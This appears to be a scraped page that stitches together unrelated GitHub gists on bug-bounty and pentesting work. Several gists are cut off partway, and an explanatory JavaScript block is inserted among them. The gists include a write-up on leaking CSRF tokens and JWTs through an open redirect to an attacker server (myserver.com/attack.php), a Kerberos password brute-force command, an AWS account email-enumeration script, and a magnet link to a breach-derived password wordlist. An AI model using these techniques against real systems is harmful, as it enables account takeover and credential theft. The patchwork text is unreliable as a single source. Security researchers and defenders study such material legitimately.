Matthew Linney Taius

#!/bin/bash
# Usage: ./script.sh urls.txt   -> writes urls.txt-urls.html
# Wraps every line of the input file in a clickable <a> tag. The URLs are
# written into the HTML unescaped, so only feed it a file you control.
echo "<title>Generated hyper Link URLS</title>" >> "$1-urls.html"
while read -r urls; do
    echo "<a href=\"${urls}\">${urls}</a><br><br>" >> "$1-urls.html"
done < "$1"
{
  "mode": "patterns",
  "proxySettings": [
    {
      "address": "127.0.0.1",
      "port": 8080,
      "username": "",
      "password": "",
      "type": 1,
      "title": "127.0.0.1:8080",
@hakluke
hakluke / openinbrowser.py
Created May 18, 2019 15:38
Little Python script to open a list of URLs from a file in browser tabs, n tabs at a time
#! /usr/bin/python3
import webbrowser, sys
if len(sys.argv) < 3:
    print("Usage: openinbrowser.py ./urls.txt 20")
    quit()
f = open(sys.argv[1])
tabs = int(sys.argv[2])
counter = 1
for url in f:
    url = url.strip()
    if not url:
        continue  # skip blank lines rather than opening an empty tab
    webbrowser.open_new_tab(url)
    if counter % tabs == 0:  # pause after every n tabs so the browser is not flooded
        input("Opened %d tabs, press Enter to open the next batch..." % counter)
    counter += 1
@hakluke
hakluke / grepips.py
Last active April 3, 2022 16:59
Little Python script to dump IP addresses from a file
#!/usr/bin/python3
# Usage: grepips.py <file>   -> prints each distinct IPv4-looking string once
import sys, re
with open(sys.argv[1], 'r') as f:
    text = f.read()
ips = []
# Matches dotted-quad shapes only; out-of-range octets such as 999.1.1.1 also match.
# re.findall returns a (possibly empty) list, never None, so iterate directly.
for match in re.findall(r'\b(?:\d{1,3}\.){3}\d{1,3}\b', text):
    if match not in ips:  # keep first occurrence, preserve order
        ips.append(match)
for ip in ips:
    print(ip)

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input on the client side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. JavaScript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user
    GET /verify/VALUE HTTP/1.1
    Host: example.com
    
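As an added illustration of the client-side point in the write-up above (this is example code, not the gist author's): a browser-side helper that builds the URL for the GET /verify/VALUE request from the `code` query parameter. The unsafe form concatenates the raw value into the path, so a value containing path or query characters changes which endpoint the request, and the x-csrf-token header attached to it, is sent to. The hardened form checks the value against an expected format and URI-encodes it before use. The `/verify/` path and the origin come from the write-up; the allowed token pattern and the sample `code` values are constructed for this example.

```javascript
// Added example: building the /verify/<code> request URL from user input.
// Both helpers take the raw `code` query parameter and the page origin.

// Vulnerable: raw concatenation. A value containing "/", "?" or ".." is
// interpreted by the URL parser and can move the request off /verify/.
function buildVerifyUrlUnsafe(code, origin) {
  return new URL("/verify/" + code, origin).href;
}

// Hardened: allow-list the token shape, then percent-encode it.
// CODE_PATTERN is an assumption for this example; use the real code format.
const CODE_PATTERN = /^[A-Za-z0-9_-]{1,128}$/;

function buildVerifyUrlSafe(code, origin) {
  if (typeof code !== "string" || !CODE_PATTERN.test(code)) {
    throw new Error("invalid code parameter");
  }
  return new URL("/verify/" + encodeURIComponent(code), origin).href;
}

// True if the resolved URL still targets /verify/ on the expected origin
// with no query string, i.e. the value did not escape the intended path.
function staysOnVerifyEndpoint(href, origin) {
  const u = new URL(href);
  return u.origin === origin && u.pathname.startsWith("/verify/") && u.search === "";
}

// Constructed sample inputs: the benign value from the write-up, and a value
// built from the write-up's own open-redirect path to show the path escape.
const ORIGIN = "https://example.com";
const benign = "VALUE";
const hostile = "../redirect?url=https://myserver.com/attack.php";

// Demo when run directly with node
if (typeof require !== "undefined" && require.main === module) {
  console.log(buildVerifyUrlUnsafe(benign, ORIGIN));   // https://example.com/verify/VALUE
  console.log(buildVerifyUrlUnsafe(hostile, ORIGIN));  // resolves to /redirect?url=...
  try {
    buildVerifyUrlSafe(hostile, ORIGIN);
  } catch (e) {
    console.log("rejected:", e.message);
  }
}
```

`encodeURIComponent` alone already keeps "/" and "?" inside the path segment; the format check on top of it is what you want when the value is meant to be an opaque token, because it also rejects anything the server would not have issued.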
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With the Rubeus version that includes the brute module:

#!/usr/bin/env python3
# Google Groups v1
# python3 ggroup.py domains.txt
import requests
import re
import sys
with open(sys.argv[1]) as f:
    sites = f.read().splitlines()
@flerpadoo
flerpadoo / awsEmailCheck.py
Last active July 23, 2020 22:36
Determines if there is an AWS account associated with a given email address
import re
import sys
import subprocess
from time import sleep # Can be optimized / replaced
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
def bruteAmazonEmailLogin(userEmail):
    options = Options()
    options.add_argument("--headless")
@OffXec
OffXec / pentest.sh
Last active August 31, 2022 13:25
Installs pentesting tools, then symlinks them to be ran seamlessly.
#!/bin/bash
# Clones each tool into /opt and symlinks its entry point into /usr/local/bin
# so it can be run by name. Needs write access to /opt (run as root or fix ownership).
git clone https://github.com/danielmiessler/SecLists.git /opt/seclists
git clone https://github.com/s0md3v/XSStrike.git /opt/xsstrike
chmod +x /opt/xsstrike/xsstrike.py
sudo ln -s /opt/xsstrike/xsstrike.py /usr/local/bin/xsstrike
git clone https://github.com/s0md3v/Arjun.git /opt/arjun
chmod +x /opt/arjun/arjun.py
sudo ln -s /opt/arjun/arjun.py /usr/local/bin/arjun
magnet:?xt=urn:btih:827FBFFA925AF95BA20C7C0BA8D35807C1E31C75&dn=Combined_HaveIBeenPwnedWordlists.txt&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce